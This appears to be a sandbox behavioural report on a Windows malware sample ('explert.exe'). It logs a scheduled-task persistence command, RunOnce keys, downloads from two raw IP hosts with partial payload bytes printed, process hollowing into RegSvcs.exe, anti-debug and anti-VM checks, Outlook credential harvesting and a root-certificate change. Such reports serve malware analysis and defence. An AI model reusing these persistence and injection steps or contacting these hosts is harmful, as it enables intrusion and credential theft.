file	C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c timeout 10 & exit
cmdline	C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe" /F

Drops a binary and executes it (3 events)

file	C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
file	C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
file	C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Roaming\d3d9.dll

Executes one or more WMI queries (3 events)

wmi	SELECT * FROM Win32_Processor
wmi	SELECT * FROM Win32_BaseBoard
wmi	SELECT * FROM Win32_DiskDrive

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 25, 2024, 8:49 a.m.	show_type: 0 filepath_r: cmd parameters: /c timeout 10 & exit filepath: cmd	1	1	0
ShellExecuteExW July 25, 2024, 8:49 a.m.	show_type: 0 filepath_r: cmd parameters: /c timeout 10 & exit filepath: cmd	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2468 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 1568768 protection: 16 (PAGE_EXECUTE) base_address: 0x000000001c2d0000 process_handle: 0xffffffffffffffff	1	0	0

An executable file was downloaded by the process explert.exe (4 events)

Time & API	Arguments	Status	Return
InternetReadFile July 25, 2024, 8:48 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEdCM¡fð"\| @ À`@@ ® H.text`{ \| `.rsrc® ~@@H¬r\2c¥Xö.(_(20E( s %rpo %r po %o %o ( ¨ao &Þ&Þ;A0++ Þ (+õ +ô&Þì++ü( Þ~-r3pÐ+++~( +êo +ås +à~.++÷+rmp~+ t(+ço +ì(! ( 0s+5+:+?+D+I-(+Grp+C,,-+?ÞH+>rp(" ,Þ6Þ2(# +Äo$ +¿o% +ºo& +µ +´+¶(" +¶+¾+¿&Þ,û-øff( >+s' +ó08º8¿8À8Á{8½&-E8¾,28½{8¸,ë,8¸r±po( &{o) &rÇpo( &,N{o* ,{+rÝpo( &rípo( &{ o* ,{ +rpo( &o+ s, 8<ÿÿÿ 8;ÿÿÿ8:ÿÿÿ89ÿÿÿo( 89ÿÿÿ8<ÿÿÿ8=ÿÿÿ(- 8>ÿÿÿ8Bÿÿÿ0ó}~. }~. } ~. }.%,o/ 8¨o0 rpo1 ,o2 s3 }+zr-po1 ,,o2 }{rÝp(" ,N~. }+Ar?po1 ,-o2 } { rp(" ,~. } +}Xi?Oÿÿÿ( ( 0$+þs4 + Þ(5 +éo6 +ð&Þ* 0«,W~ -P~+l8m8nr_p+ ~ ,~ +-Þ-çÞ(7 +Ùo8 +å-(9 Ü~+2+3+8,-+6(-~ * 8ÿÿÿ8ÿÿÿ(: 8ÿÿÿ+Ëo; +Æ(+Á(< +Ã5P 0u+]8^8c,++++!+",%,ú+!Þ4+ o= -åÞ'+âo> +Ý+Ü(" +×+Ü+Ý-,o? Ü-û-ø8ÿÿÿo@ 8ÿÿÿ 8ÿÿÿ<H 0p- , +2+7+<+<+,ì+8+9+9+>+C3,ÞEX-i2ÛÞ4sA +ÇoB +Â +Á+Á+Å+ÄoC +ÀoD +»oE +¶&Þii( 2+(F Ò( s})s}}#i{)(}0\|9%Ð+Q-B9%Ð+A,æ9%Ð +1%,»9%Ð+!-¤-ã(G +¨(G +¸(G +È(G +Ø.+{2+÷¾+${0+ {/-Y-ò+{2-c-øX+Ù+Ý+è^+{/+{0þ+î+ò( ^ =}5( 0÷ =8²:9«&,\+8¦%X8£8¢ 2ä,`+-É8%X8 8 2à+8%X %,62é+%X 2ðs!: = +%X 2ó,®s!;* 8Hÿÿÿ8Pÿÿÿ8Tÿÿÿ8Wÿÿÿ8Xÿÿÿ8fÿÿÿ8iÿÿÿ8kÿÿÿ8sÿÿÿ:( (?( 0\9%Ð+9B-ê%,9%Ð+'C-ä%,Í9%Ð+O(G +À(G +Ò(G +å®}V( s.}X{Xs+}Y.+{W+÷¾+'{V3+{X{-í%-ëþ,ç%-ï+Ö+ÞR+{Y++õ(K+õ0² 9%Ð8^b=%Ð8Qc >l =m-\8/+-~l8)08(Xb8&-~m%X88 2Ç+&~l8 Xb(A~m%X 2Ò::ÿÿÿ+(~l ÿÿÿX b(A9ÿÿÿ~m%X 2Ð+~l¨Xb(A~m%X 2Ú>n=o:3ÿÿÿ +(~nb(A9¿þÿÿ~o9ÿÿÿX 2Ó(G 8þÿÿ(G 8¥þÿÿ 8Ëþÿÿ8Ñþÿÿ8Òþÿÿ(A8Ðþÿÿ 8Üþÿÿ8Ýþÿÿ8êþÿÿ0g( }d s}es}fs}g @>}h @=}iÚ( }w}r}v>}p9}u0Z ( }s)} =} >} >}% }}.+{+÷:+ {þ+ô^ =}( (H &(I 0} +]{h+\{j+V{i+R+S{j+O+PX}j+J+KÒ{e{p>%HXhS{j @þ,%-÷þ8ÿÿÿ+¡+§+«+ª +®++³+²0+Þ (+÷&Þ?0M+,+-+.{+{+&+'-ç+)+{+&X},é*+Ñ+Ð+Ï+Ó+×(J +Ò+Ô+Ó+×0¡ -1 request_handle: 0x00cc000c	1	1
InternetReadFile July 25, 2024, 8:49 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $ðºÖ´Û¸y´Û¸y´Û¸y½£+yºÛ¸yvZ½xÛ¸yvZ¼x¸Û¸yvZ»x¥Û¸ys®¹xªÛ¸y´Û¹y©Ú¸y´Û¸yÜÛ¸yGYºxµÛ¸yRich´Û¸yPEdPfð"'z 0@@`\|¾hð,0ØvTx(Àt@ h.text `.rdataX2 4 @@.dataÀ àÆ@À.pdata,ð.È@@_RDATAô ö@@.relocØ0 ø@BVWSHì HÁáùu@HpÿHxÿHXHùÿHSHÒtLCHùè¶CºA¸HñHÄ [_^éCHÄ [_^ÃÌÌÌAWAVAUATVWUSHì8fD)$ f)¼$)´$Lt$(H\$XH¼$ H5¡L¬$WöfWÿf.HÜªHD$(HL$(H¸Î!{ÿ¨ùHD$(HT$(èvHHº»úÚùæ>H1ÑHPI¸?Ðú¨L1ÂD@A¹Iù´¢E1È¶@4gHL$XHT$`DD$hD$lH$ HÇ$¨H¼$L=Ì>L¼$Ht$(HÇD$0HÇD$HLl$8HÇD$@Lñè'Hù/HD$(HL$(H¸¯6¶#×ÙHD$(HT$(è-HHº¼A çÿµH1ÑHPI¸£1h¥ÜÈL1ÂL@I¹ù>ÙUºØÂ2M1ÈD¶H·@AÂAÁê4PAò&Añ`HL$XHT$`LD$hD$pDT$qDL$rH$ HÇ$¨H¼$L¼$Ht$(HÇD$0HÇD$HLl$8HÇD$@LñèCH 3HD$(HL$(H¸ ÔSHD$(HT$(è HHºGX?-.}H1Ñ¶P ·@AÀAÁè4Að¾ò»H$$D$$Ll$XHÇD$`H$ L¼$¨Ht$(HÇD$0HÇD$HH\|$8HÇD$@LñèHKºHD$(HL$(H¸xÑàï81ù¤HD$(HT$(è¾HHºfÄJ¦Ñ.²H1ÑPA¸Ë^kD1Â·@AÀAðhÁè4!H$$D$$Ll$XHÇD$`H$ L¼$¨Ht$(HÇD$0HÇD$HH\|$8HÇD$@LñèÉHVHD$(HL$(H¸m¡Õ8§BÄHD$(HT$(èHHºEâ+ktw ûH1ÑHPI¸Fq jÍàqL1Â¶@4ÌHL$XHT$`D$hH$ HÇ$¨H¼$L¼$Ht$(HÇD$0HÇD$HLl$8HÇD$@LñèHñHD$(HL$(H¸M[ªzõHD$(HT$(èÿHHº36ß'_á?âH1Ñ¶P ·@AÀAÁè4õAðÄòH$$D$$Ll$XHÇD$`H$ L¼$¨Ht$(HÇD$0HÇD$HH\|$8HÇD$@Lñè^H²åHD$(HL$(H¸/çqaº5~HD$(HT$(èTºr`Ê$1ÑD¶@·@ÂÁê4òAðFE¶ÀD$IÁà0¶ÒHÁâ(L Â¶ÀHÁà H Ð$HÁè f$Ll$XHÇD$`H$ L¼$¨Ht$(HÇD$0HÇD$HH\|$8HÇD$@LñèHÇ$ØHÇ$àHÇ$èèyõH$ HùH$ØèõIÄHÕHp¡HD$(HL$(H¸ËûÚo%xHD$(HT$(è¡HHº~tXWö½H1ÑHPI¸ö°Ï<ÄL1ÂD¶@·@AÁAÁé4AñbAð_HL$(HT$0D$8DL$9DD$:Mä¬H$àH$èè@9HÁèXËHÅ@öÅ HÁí ý( H¾àHD$(HL$(H¸PúDÿe³U7HD$(HT$(èôHHºjì1ÎGÞH1ÑHPI¸Ex×¦&Å&L1ÂD@A¹nR%ÀE1ÈD¶H·@AÂAÁê4AòLAñ\|HL$XHT$`DD$hD$lDT$mDL$nH$ HÇ$¨H¼$HL8H$I÷Ht$(HÇD$0HÇD$HLl$8HÇD$@Lñè¤þHÇ$HÇ$HÇ$èóH$ HùLîLêè¥óIÅIÔH¹HD$(HL$(H¸Ô7ð\|è^HD$(HT$(èHHº¥QÙÃ]H1ÑHPI¸%¾«¨ YL1ÂD¶@·@AÁAÁé4Añ:AðnHL$(HT$0D$8DL$9DD$:MíÎ H$H$èT7IÐH$ÈHÂèQÃ¼$È/IõHäHD$(HL$(H¸N¨Ò=ýHD$(HT$(è6HHº[oGD-'H1ÑHPL@LHLP D¶X·@(HL$XH¹e4U7³fëH1ÊHT$`H¹Wû ¦ îI1ÈLD$hH¹é¨uÁä.âI1ÉLL$pH¹Ú¨mèA ®óI1ÊLT$xÁ4r$ÁéñU$Aó D$H$ HÇ$¨+H¼$¸H)6H$ÀLþL\|$(HÇD$0HÇD$HH$¸HD$8HÇD$@LñèyüéÅòD$ÐHH3HD$(HL$(H¸§-íJÞHD$(HT$(è HHº7õC¨å¶J H1ÑHPI¸n-QÎoL1ÂH@I¸Î¹Â÷QÕ#L1ÀHL$XHT$`HD$hH$ HÇ$¨H¼$¸HL5H$ÀL\|$(HÇD$0HÇD$HL¤$¸Ld$8HÇD$@LñèûHÇ$ HÇ$¨HÇ$°èðH$¸LáHúè£ðIÅIÔHÒDHD$(HL$(H¸àùÆHD$(HT$(è# HHº:øìðèH1ÑHPI¸v[[\îÿAL1ÂD¶@·@AÁAÁé4Añ8Að²HL$(HT$0D$8DL$9DD$:MíÚH$¨H$°èR4IÐH$ðHÂèOÀ request_handle: 0x00cc000c	1	1
InternetReadFile July 25, 2024, 8:49 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL±fààäà@p@òx 4M.text[Þà `.rdataÛ*ð,ä@@.dataü j@À.reloc4M Nz@B request_handle: 0x00cc000c	1	1
InternetReadFile July 25, 2024, 8:49 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¤ fà >¹ À @ @ä¸ WÀ à H.textD `.rsrcÀ @@.relocà ¤ @B ¹ HHKmrl~Ù:¸ïû¾ÝÜ[sÂvuGH«9os63ð¯bGîIù«°åµ¢ÞZ]¶0pëQuÔÄ Æ´ìÖ'G;¢³¯{zg0o¬}Cá¿¡ëFºm^ðÛQîJé.¯¢¢ä;xá¢±0ÝDIÔ¿,J?ãU²6Éq1= dSÝk;Ù]+j`[ÏC¾@ <øô\|uEÊÄÞq/VÕÃhãÖ.yó6ljôõANø »aÍèQßh¼}XWî}?©m0Käà9ü®f²ÞçÆÒeDóIÏ±:AZn Ý·"AÂÝ¾ê¾³ßù½>ý(É#¥3j ³ÓärÔLÉ$WpÉÄmßåøI¿WQ¬OnûÔ$}%Zuï¼¬I!k¾,g[îlj¹(vÖÞtæâ;PKÍ«ðùw#ô]£ ç 6§Çõvês:÷!°[ê!GúÊi{¶Á5ùÕÚPdsÀs>OÞû Y¼ôÝ ½×½=Î]Wneóâ[^)`)¯ã³§£ö8«ßa.^¤,%Î[ñÅïºôÓÀ¯ð[²Ì%çÈ^gvr±'ÞÏÊ¤Gé0¨Èy+õÒNz£^5Á¬ÙÑ áulL¨î¸ÚDÔM£©8R'õàÅ¨ç<4s/wÆæÒOÅ6I ¨?þ8/~!NT5µ¥F2÷UÍø¼Ux¶b !-ä_xí@Ðò)çD)Ðwõw¥ â/y9^Ý ÌÊ²½m JGö`ïÝ6~;Äö¡æu©Âo9å~Ø+ÿÉÕ®ÈÜ+ÁÐäðpv>Ê'MÂ>]H%ÅézWGá¢¶ûª @íK¾HþÄãibüe}i®Û-)ÔóÑhfN½©ß\³Yñ#Ô×v¥&VRfk¾ù¼ÍÎa[À!AB}ôéò-k¡Õöð´ÒÃEJÌ°6Òqr:Ô¯FjÎk<üÓy Ú¿3 'NR>/Ù8Ïun®O[HmeOâ½#³áÃ{Sð;iÔû%Cmþçö¥Ã½Åâ}äü_Ú!EÃª[ å½þâd§ò\6Æ¬,ÖFhTöiæu¿vÈ£ûéÊ¨O¨Í¾ñtsCF ÎîÀzçs@á E\|ÄäØÙ"pfÔ«ÈLÉóÆ^$÷B\a6«SK,8áÏÝî,$½©ÕÒ@!ñ40ÿêÍ÷vv#[)ÇÙr ³~çrO1MÃ¯1æÊä ÊnçzãZÁ3%MNú´lr¸à,úÑ@ÀP9±?ß~¹ qr¾1 øîÏÛ°TRð%añbIú»4C2ïÌÄÄm0@&Ð·AºdËsþm³2{µ«÷[lhî=qðn»íÈKúa±4¶Kía{ºP&-]âï÷Á¾¦ÓM~=ÙæZ½¿ÿêÃÃó¨§M£Ãæ^pJüÆIç55 ¢xA'g/:{xê-wÓÕcÁI¯fw²[Ãº(Ft[Ê`ó%G¡mÞÅs¸Nàåová'Û/¤©<zÞP¢¨fªO%þ¤üj-}÷é2PéiÑi=P/F@éÂÆ}¼º1ïEc½<JäX÷ïkþ¿-oä`A]¿{"ïëõ¿\(àZ^2~¾0CÏzCË»aoæ·÷?¶`Á-(¤Jà¼]$ÅÅó¢õùöéaå¾^HÓØS\|$uÒ0²2nÊäÊúì¿NE~ZÀV3{ÜÅÚU³U]u¯lÀdÐ®°$A´8/ªA@\|ð,ZOpnWlO!¸¿\|âÄ78`6&yo§TÚÊä`@fý/#§h~Y:ús×Q]ÓYüE<À³òÍÕ/ýQU·MúCOéCÚ`ïÒ¢ô¢éúDu¥Ë^ÍI\|É®ÿ¹<z Ð$a>´{fÝSÐEÆUÓ¶WNÙ-M6bÂ+;~?Zð2¥?êí¦Öïèñ)Ñ£uNêWTqWgÊÉ¢ª¯åÛ¡¾5n<Ü%ÎOCLKo1¸Ý³wmîMq¤ ÛI ²k7{Oãggò2óêT¸×Üì²µÈWæÉºÓØZXsNå½ø§JÖ>fÃ6à1Ç>ÁóYÂÕº\|üsòõsô$T¿3EÓI¬U¡`1Í >r;¶'r¼ õ¤+=îãýèÀ\¤§(sÔÂÐ1H[gvªî·m,QÝôþLÜ¶ë&×ÇÄIPý85yJ}ü®( F¨ér.T0gQÄ,76 K$ÇÀé¡P¨ðàb´;F¨û'ûÝ©à,aé¸ìR£¦îÁg0b9tn³àÒnêÊ\|]AõÑ[Z³&q´l"{W=Îjë$`A£/OríÀ,3Ö³?¡½yºYêöHñv/S]à\|LÝTíÿÂsÿor>§Y#ÜR~ tþ¡uó'Ó,<¢Cß4 Ûj¤Â;ÌÈò¾ëØ¶c=¦ÑÑ¯X¶A\Áµ}ðâKLf+Sõ%¿±Õvû§ïÓzÒ;ýë+ì¯%RÜí»tAVËÓbÚoS»þVLxØ$ÅÉ':ÄGCÞÒØéPßEÃ?³v³ci9\|[Ö¶feõZMíG¿ÒN AW¸Uÿ¨õôÕÕ¦ÒñÿXvtânÒúråN`%w@N¹>yñ?´ílSõ#ø´H1¸p"ð·%×"ß4è§µ5ºuø©«×?Ô"ÒI+öz{XO-¸Æ+#L=ÀS Ç_RFOÿñ·ÈÛ¡ýßh Íê4Yø¿6/zÕÇ);f"lÊuáøG¿¹Ê £pÏph>ÏÚ(í¬ýô$ÑLuDÎMìoÅÙâGhS#c·eÄ®8ãfàÃìÉ&?¦(BÞv$;«ÖgP0ÑÛlKGrø¹Ñµ9K=ldNHÑoR¹¦z@¼ö QnÝpØRÇEJ ©^R±ôDÝ.õúôc¿Ç[zÁddà®ïÛ÷(lÔS[ys7éïKPþ]óéûJnÚÆ)OÄ_]QáàÝ¡ !¹¦VöÜj¹.0ä>÷Q(=7Ó!Ó-U ªKUlèÌÖµ¼Í£s¡sÊeÇ5rDdý¢Ævb:Ý_¤QÀØ%2ÆrëUõ®oF Ú»lLâÎ'êÎKÃ¥}aQ/KÙ+iéä!ÿÈ=®'üGu¨x¹Ø¼úmº-²Îê<sþóKS±c @¡E+j(9 ¤Ûa9KÔ\»ÇOúñ¹7äWK\)<è¤w<(ý¾½ksîÕoYØµ{úA:¿ dyPóÿ#0¶AdÏ%µ)¬¿ñ¡U=PáükFXåþ[ÐNê=0!ðê¼Dk\|Epç$AËLK$Ñw&fT²ó t'ßVh_Þ7º[A+Õö ·ÏË'#óãöäyîøÅÉ2¦ÚËTDÂ¼stPýÉ´ïõ»è¼áª¯ß;Ô"¤j"ÏO õÏëý£$½ª¥8<Ò§ôãeT vxÑÏn¹£!Ü¹<ÝY+¶JÀí»ûÀ©¾à¦ìzt¼Z ´üÍ R·9÷U¬a^»®NÝQÉßSæñúFýÂÃ Èq{Î?Ô,´´oµ5µ/@8F Ô(N`) &@HM\³{+>}éÕluÈAÎdÝë he4³=(">ÙõUtöÞk{+ tD=öyÄ¯¤5ð ÑÚ\b<¬#+1íNüÆÈ¾,×ºMý.¸¢<Âø7 OË:.@X ÃÊ¯º¥Rl¿²ß UmBõórÚ5À¸ZÞ )ÚÞâõ§ÅäÎ4_¸¾ÿUÐÖÑÔ}ù¦t±HàN½$Çq¦jù¤ú£Jæ'Y¡!Ê¯âÎd«BÔ»ô@ö æøH`×nh<ú6Ûèò¦èõP<uAý=»</HÒÂÏ)¸WE¸ñª8ñH))x½XÀA$6r¼©>yØïëyxóñ8¢'ÆeËqP§ÄÝº ÇÄòD%V~ÿg# j¤f ÛÙU^Ù^î¼gZTDy¡â«4Ò&iy¤cWAl}8#®ëzFÝziÖð3#þ~e request_handle: 0x00cc000c	1	1

Yara rule detected in process memory (9 events)

description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe" /F

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: af1a6ac67a1e2103e530b9e35a5e78c026a4fc36

Communicates with host for which no DNS query was performed (2 events)

host	185.196.10.57
host	185.216.214.218

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2936 region_size: 356352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000052c	1	0	0

Checks the version of Bios, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

Installs itself for autorun at Windows startup (15 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\explert.exe	reg_value	C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe
cmdline	C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe" /F

Detects Avast Antivirus through the presence of a library (4 events)

Time & API	Arguments	Return
LdrGetDllHandle July 25, 2024, 8:48 a.m.	module_name: snxhk.dll module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle July 25, 2024, 8:48 a.m.	module_name: snxhk.dll module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle July 25, 2024, 8:48 a.m.	module_name: snxhk.dll module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle July 25, 2024, 8:48 a.m.	module_name: snxhk.dll module_address: 0x00000000 stack_pivoted: 0	3221225781

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 25, 2024, 8:49 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2936 process_handle: 0x0000052c	1	1	0
WriteProcessMemory July 25, 2024, 8:49 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL±fààäà@p@òx 4M.text[Þà `.rdataÛ*ð,ä@@.dataü j@À.reloc4M Nz@B base_address: 0x00400000 process_identifier: 2936 process_handle: 0x0000052c	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 25, 2024, 8:49 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL±fààäà@p@òx 4M.text[Þà `.rdataÛ*ð,ä@@.dataü j@À.reloc4M Nz@B base_address: 0x00400000 process_identifier: 2936 process_handle: 0x0000052c	1	1	0

Harvests credentials from local email clients (1 event)

file	C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2220 called NtSetContextThread to modify thread in remote process 2936
NtSetContextThread July 25, 2024, 8:49 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4234208 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000158 process_identifier: 2936	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2220 resumed a thread in remote process 2936
NtResumeThread July 25, 2024, 8:49 a.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 2936	1	0	0

Executed a process and injected code into it, probably while unpacking (38 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 25, 2024, 8:48 a.m.	thread_identifier: 2112 thread_handle: 0x000000d4 process_identifier: 2108 current_directory: filepath: track: 1 command_line: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe" /F filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000000d0	1	1
CreateProcessInternalW July 25, 2024, 8:48 a.m.	thread_identifier: 2224 thread_handle: 0x00000278 process_identifier: 2220 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000280	1	1
CreateProcessInternalW July 25, 2024, 8:48 a.m.	thread_identifier: 2280 thread_handle: 0x000000d0 process_identifier: 2276 current_directory: filepath: track: 1 command_line: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\test22\AppData\Local\Temp\23495762359867\explert.exe" /F filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000000d4	1	1
CreateProcessInternalW July 25, 2024, 8:49 a.m.	thread_identifier: 2472 thread_handle: 0x00000514 process_identifier: 2468 current_directory: filepath: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe track: 1 command_line: filepath_r: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x0000051c	1	1
CreateProcessInternalW July 25, 2024, 8:49 a.m.	thread_identifier: 2616 thread_handle: 0x00000524 process_identifier: 2612 current_directory: filepath: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe track: 1 command_line: filepath_r: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000520	1	1
CreateProcessInternalW July 25, 2024, 8:49 a.m.	thread_identifier: 2940 thread_handle: 0x00000158 process_identifier: 2936 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000052c	1	1
NtGetContextThread July 25, 2024, 8:49 a.m.	thread_handle: 0x00000158	1	0
NtAllocateVirtualMemory July 25, 2024, 8:49 a.m.	process_identifier: 2936 region_size: 356352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000052c	1	0
WriteProcessMemory July 25, 2024, 8:49 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2936 process_handle: 0x0000052c	1	1
NtSetContextThread July 25, 2024, 8:49 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4234208 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000158 process_identifier: 2936	1	0
WriteProcessMemory July 25, 2024, 8:49 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL±fààäà@p@òx 4M.text[Þà `.rdataÛ*ð,ä@@.dataü j@À.reloc4M Nz@B base_address: 0x00400000 process_identifier: 2936 process_handle: 0x0000052c	1	1
WriteProcessMemory July 25, 2024, 8:49 a.m.	buffer: base_address: 0x00401000 process_identifier: 2936 process_handle: 0x0000052c	1	1
WriteProcessMemory July 25, 2024, 8:49 a.m.	buffer: base_address: 0x0043f000 process_identifier: 2936 process_handle: 0x0000052c	1	1
WriteProcessMemory July 25, 2024, 8:49 a.m.	buffer: base_address: 0x00442000 process_identifier: 2936 process_handle: 0x0000052c	1	1
